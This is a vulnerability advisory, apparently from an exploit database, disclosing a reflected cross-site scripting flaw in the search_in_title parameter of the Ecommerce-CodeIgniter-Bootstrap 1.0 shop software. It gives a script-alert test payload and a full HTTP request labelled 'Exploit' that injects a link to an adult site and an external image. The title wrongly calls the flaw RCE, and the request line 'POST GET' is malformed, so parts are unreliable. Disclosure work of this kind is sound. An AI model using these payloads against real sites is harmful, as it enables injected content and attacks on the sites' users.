Ecommerce CodeIgniter Bootstrap 1.0 Cross Site Scripting

2022.10.31
Credit: nu11secur1ty
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

## Title: Ecommerce-CodeIgniter-Bootstrap-1.0 Cross-site scripting (reflected) RCE ## Author: nu11secur1ty ## Date: 10.29.2022 ## Vendor: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap ## Software: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/archive/refs/heads/master.zip ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap ## Description: The value of the search_in_title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5iun"><script>alert(1)</script>h4s83 was submitted in the search_in_title parameter. The malicious user can use this vulnerability to exploit every user of this system to make them a bot machine and etc. [+] Exploit: ```POST GET /Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=f5iun"><a%20href="https://pornhub.com/"%20target="_blank"%20rel="noopener%20nofollow%20ugc">%20<img%20src="https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif??token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1"%20style="border:1px%20solid%20black;max-width:100%;"%20alt="Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!">%20</a>h4s83&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592 HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: ci_session=vndq7brjjjf1an7k6s3q913bsqjf03it Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` # Proof and Exploit: [href](https://streamable.com/y3q67i)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top